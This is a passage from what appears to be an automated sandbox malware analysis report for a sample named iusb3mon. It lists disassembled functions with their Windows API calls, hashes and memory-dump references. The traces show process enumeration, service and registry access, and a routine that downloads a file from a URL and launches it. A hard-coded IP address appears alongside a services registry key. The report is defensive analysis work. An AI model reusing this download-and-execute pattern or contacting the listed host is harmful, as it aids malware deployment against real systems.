                                                                                                                    • Opcode ID: a1953239c22922074b498c0ba7720e14f9ef4bc4097bd4d6c7bbc027563f5769
                                                                                                                    • Instruction ID: 28ec449bcbd086119e706fad0372ad83b92987c3b957f46667cb0bccfbfe6963
                                                                                                                    • Opcode Fuzzy Hash: a1953239c22922074b498c0ba7720e14f9ef4bc4097bd4d6c7bbc027563f5769
                                                                                                                    • Instruction Fuzzy Hash: FDF0AF70B743069AE7F14A24BCCDE293EA6E7807E2B92003AFF41C1054D6BD84808F15
                                                                                                                    Function 06248D94 Relevance: 6.0, APIs: 4, Instructions: 42processstringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,75918A60,06272BE8,06267FD0,06247609,06267FD0,?,?,?), ref: 06248D9B
                                                                                                                    • Process32First.KERNEL32(00000000,00000000), ref: 06248DB4
                                                                                                                    • Process32Next.KERNEL32(00000000,00000000), ref: 06248DD0
                                                                                                                    • lstrcmpiA.KERNEL32(00000024,06272BE8), ref: 06248DDE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CreateFirstNextSnapshotToolhelp32lstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2530627638-0
                                                                                                                    • Opcode ID: 9a549c2bfc5f1dcc75df7d6519a46bdde209e1d6053b0fecbe041c279cea9975
                                                                                                                    • Instruction ID: 34c8b211352066f95e0c101b2ba3cdff6b4cbe28f3a125c0c8d2e5db6f1de917
                                                                                                                    • Opcode Fuzzy Hash: 9a549c2bfc5f1dcc75df7d6519a46bdde209e1d6053b0fecbe041c279cea9975
                                                                                                                    • Instruction Fuzzy Hash: 7FF0B432236312ABE7F87A769C44E3B6AECEF95750F01085AFD59D6040DB24D4419265
                                                                                                                    Function 06241BFF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06241C0F
                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 06241C28
                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 06241C43
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?,00000002,00000000), ref: 06241C68
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 420147892-0
                                                                                                                    • Opcode ID: 73141b703bbb3f6f51f3f4201e6935f0cc765830ded2fde3c62102d71c20f999
                                                                                                                    • Instruction ID: 46ea11fc2d7120fb3bae0426b548e43fef18130fcf500c2a172d5f2dfe375d4f
                                                                                                                    • Opcode Fuzzy Hash: 73141b703bbb3f6f51f3f4201e6935f0cc765830ded2fde3c62102d71c20f999
                                                                                                                    • Instruction Fuzzy Hash: 91F096715112196BEBE0BBA5DC85EFAB3FCEB48354F0000B5ED44D2180DF74C9E58A21
                                                                                                                    Function 0625B8DB Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0625B8E8
                                                                                                                    • GetWindowTextA.USER32(?,?,00000100), ref: 0625B904
                                                                                                                    • lstrcmpA.KERNEL32(?,?), ref: 0625B918
                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0625B928
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: TextWindow$lstrcmplstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 330964273-0
                                                                                                                    • Opcode ID: e628c4f34025ef4f341dae28f1f9460e3b5dc435d9382c405b50215996c8891a
                                                                                                                    • Instruction ID: 55643f72831abf19d1dfd09362ba817175b829d6bb80bb85d6cbe6ac8fc998e9
                                                                                                                    • Opcode Fuzzy Hash: e628c4f34025ef4f341dae28f1f9460e3b5dc435d9382c405b50215996c8891a
                                                                                                                    • Instruction Fuzzy Hash: F1F0F836800219ABDF326F24EC08AE9BB6EEB18391F01C061FD89D5110E770DA948F90
                                                                                                                    Function 06243D3B Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 19stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: strlen
                                                                                                                    • String ID: Console$Groupfenzhu$Remarkbeizhu
                                                                                                                    • API String ID: 39653677-274741502
                                                                                                                    • Opcode ID: 7f11023de1ea7f05f38395fe05968f0f61170b3defc59bdc39a2812e07c32e23
                                                                                                                    • Instruction ID: 5788ae1c101e46df5d00c77714593618dabdf5f669072fe5c7fc868157b9c3ac
                                                                                                                    • Opcode Fuzzy Hash: 7f11023de1ea7f05f38395fe05968f0f61170b3defc59bdc39a2812e07c32e23
                                                                                                                    • Instruction Fuzzy Hash: 0CD02E32830310FBE794AA01FC0DFE73A99EB00760F184048BE192A0E0C6F348C0C7A2
                                                                                                                    Function 0624703A Relevance: 6.0, APIs: 4, Instructions: 17servicesleepregistryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CloseServiceHandle.ADVAPI32(?,06247029), ref: 06247048
                                                                                                                    • CloseServiceHandle.ADVAPI32(?,06247029), ref: 0624705C
                                                                                                                    • RegCloseKey.ADVAPI32(?,06247029), ref: 06247070
                                                                                                                    • Sleep.KERNEL32(000001F4,06247029), ref: 0624707B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$HandleService$Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 994006413-0
                                                                                                                    • Opcode ID: 151b65bd1c557594d9ced68023362b1a1e2919a7b3070e79d1f5ddd187967375
                                                                                                                    • Instruction ID: 33f520aa4dac2aa96db4fa2cfb2622d0b4134e4cb2bb7030cde77a28cf57dd49
                                                                                                                    • Opcode Fuzzy Hash: 151b65bd1c557594d9ced68023362b1a1e2919a7b3070e79d1f5ddd187967375
                                                                                                                    • Instruction Fuzzy Hash: D2E07E3181132ADBDBBA7FA0EE4D69C7A76AB00702F4550FAE65D684608B311FC0DE10
                                                                                                                    Function 06241606 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 181COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: bad Allocate$bad buffer
                                                                                                                    • API String ID: 3519838083-2913219628
                                                                                                                    • Opcode ID: 6d6abe68e42f18b9ffcb4c2e7d7f8abe6bf2086ebb4e61d59e6d7f8f743c39c1
                                                                                                                    • Instruction ID: ad51f5207f12a5c1297ae99053bfcf468255925cb7cffb08a04a20e33e8f3bee
                                                                                                                    • Opcode Fuzzy Hash: 6d6abe68e42f18b9ffcb4c2e7d7f8abe6bf2086ebb4e61d59e6d7f8f743c39c1
                                                                                                                    • Instruction Fuzzy Hash: 72517571E20209ABDFD8FFA5CC45ABEB7B9AF44604F108019ED15A6180DB749AA4CB91
                                                                                                                    Function 001D1EA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 001D202F
                                                                                                                      • Part of subcall function 001D6F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,001D11FC,?,?,?,?,001D11FC,?,001FA814), ref: 001D6F94
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                                    • API String ID: 3109751735-1240500531
                                                                                                                    • Opcode ID: e5f250704090ab2f9187cce799ab6e99aa4168eea754158b24e574c3a095d3bb
                                                                                                                    • Instruction ID: 81f4b2afdfbeda0e07d87369634e18368ebcd80fde8a30e3a738b563faf4838e
                                                                                                                    • Opcode Fuzzy Hash: e5f250704090ab2f9187cce799ab6e99aa4168eea754158b24e574c3a095d3bb
                                                                                                                    • Instruction Fuzzy Hash: F751D7B1910608BBCB04DF58DC41AAEF7F8FF59710F14861AF914A7781E774A944CBA1
                                                                                                                    Function 0624E2C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Info
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 1807457897-3032137957
                                                                                                                    • Opcode ID: 2cc012d97424f53e1f01738e0336b2d610f4f7a18d33b82856de7e12d966bd77
                                                                                                                    • Instruction ID: 815b03c5e0980fa15e346972070721e978c439f4be1b7fe7caebe055135cf7b8
                                                                                                                    • Opcode Fuzzy Hash: 2cc012d97424f53e1f01738e0336b2d610f4f7a18d33b82856de7e12d966bd77
                                                                                                                    • Instruction Fuzzy Hash: 4141AC315242586EFB5AA614DC4EFFA7F9DBB01740F0904F4DAC5CB192C2794A44DBA3
                                                                                                                    Function 06244498 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06246316: DeleteFileA.KERNEL32(?,062444DD,00000000,00000001), ref: 06246344
                                                                                                                      • Part of subcall function 06246316: LoadLibraryA.KERNEL32(wininet.dll), ref: 06246357
                                                                                                                      • Part of subcall function 06246316: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0624636E
                                                                                                                      • Part of subcall function 06246316: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0624638E
                                                                                                                      • Part of subcall function 06246316: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 0624639A
                                                                                                                      • Part of subcall function 06246316: FreeLibrary.KERNEL32(00000000), ref: 062463BC
                                                                                                                      • Part of subcall function 062495BC: GetFileAttributesA.KERNEL32(06245CC4,06245CC4,00000000), ref: 062495C0
                                                                                                                      • Part of subcall function 062495BC: GetLastError.KERNEL32 ref: 062495CB
                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06244519
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFileLibraryProc$AttributesConnectCreateDeleteErrorFreeInternetLastLoadProcess
                                                                                                                    • String ID: D$WinSta0\Default
                                                                                                                    • API String ID: 1472976565-1101385590
                                                                                                                    • Opcode ID: 358d4c4948e68ae109643cf393e99b20724d15a457b364914083c3c54894ae48
                                                                                                                    • Instruction ID: e9668233c77a7ed5d8996cd3d07160eb841ce5db2ae73a2c6078b9fd38739428
                                                                                                                    • Opcode Fuzzy Hash: 358d4c4948e68ae109643cf393e99b20724d15a457b364914083c3c54894ae48
                                                                                                                    • Instruction Fuzzy Hash: 1D01C4739212152AEB98B7E4AC04FEF77ACEF05365F100426FE12EA045EA749645CAE1
                                                                                                                    Function 06245C32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71filenetworkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 06245C98
                                                                                                                    • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 06245CAE
                                                                                                                      • Part of subcall function 062495BC: GetFileAttributesA.KERNEL32(06245CC4,06245CC4,00000000), ref: 062495C0
                                                                                                                      • Part of subcall function 062495BC: GetLastError.KERNEL32 ref: 062495CB
                                                                                                                      • Part of subcall function 06245AA1: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 06245AEA
                                                                                                                      • Part of subcall function 06245AA1: RegQueryValueA.ADVAPI32(00000000,00000000,?,06245CD7), ref: 06245B09
                                                                                                                      • Part of subcall function 06245AA1: RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 06245B14
                                                                                                                      • Part of subcall function 06245AA1: wsprintfA.USER32 ref: 06245B3C
                                                                                                                      • Part of subcall function 06245AA1: RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 06245B5C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileOpenwsprintf$AttributesCloseDownloadErrorLastQueryValue
                                                                                                                    • String ID: c:\%s
                                                                                                                    • API String ID: 2251979229-3279930864
                                                                                                                    • Opcode ID: f85e518c836970b9f20847a531857a00e41e8cd568576fa79dc86822fd5e5369
                                                                                                                    • Instruction ID: 46e5cbae4469d10932b560654a927d499255816c4da29e3190a97988020be80e
                                                                                                                    • Opcode Fuzzy Hash: f85e518c836970b9f20847a531857a00e41e8cd568576fa79dc86822fd5e5369
                                                                                                                    • Instruction Fuzzy Hash: D8110A72A643157AFBA4B7A4DC88FEB376CDF04350F240465FE15F1081EA749A448691
                                                                                                                    Function 0624708C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,06246C72,?,?,?,202.79.169.178), ref: 062470E9
                                                                                                                    Strings
                                                                                                                    • SYSTEM\CurrentControlSet\Services\, xrefs: 062470B3
                                                                                                                    • 202.79.169.178, xrefs: 0624709C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Open
                                                                                                                    • String ID: 202.79.169.178$SYSTEM\CurrentControlSet\Services\
                                                                                                                    • API String ID: 71445658-4084533604
                                                                                                                    • Opcode ID: 281a9c64337ed2a9638a3bd175184e6ff8d6e9d66a19807be1167299358f9c45
                                                                                                                    • Instruction ID: d2ee83f1d59bfcf9f8923bd18effcfb1dd02c4c7ac45f809b68230d366fbea9c
                                                                                                                    • Opcode Fuzzy Hash: 281a9c64337ed2a9638a3bd175184e6ff8d6e9d66a19807be1167299358f9c45
                                                                                                                    • Instruction Fuzzy Hash: 32F0A776A6C21C7AEBA0E6B4DC46FE9736CDB14700F1004E1B7C5F1081EEF0AAC88A51
                                                                                                                    Function 001D1280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 001D1285
                                                                                                                      • Part of subcall function 001D3A15: std::invalid_argument::invalid_argument.LIBCONCRT ref: 001D3A21
                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 001D12AE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
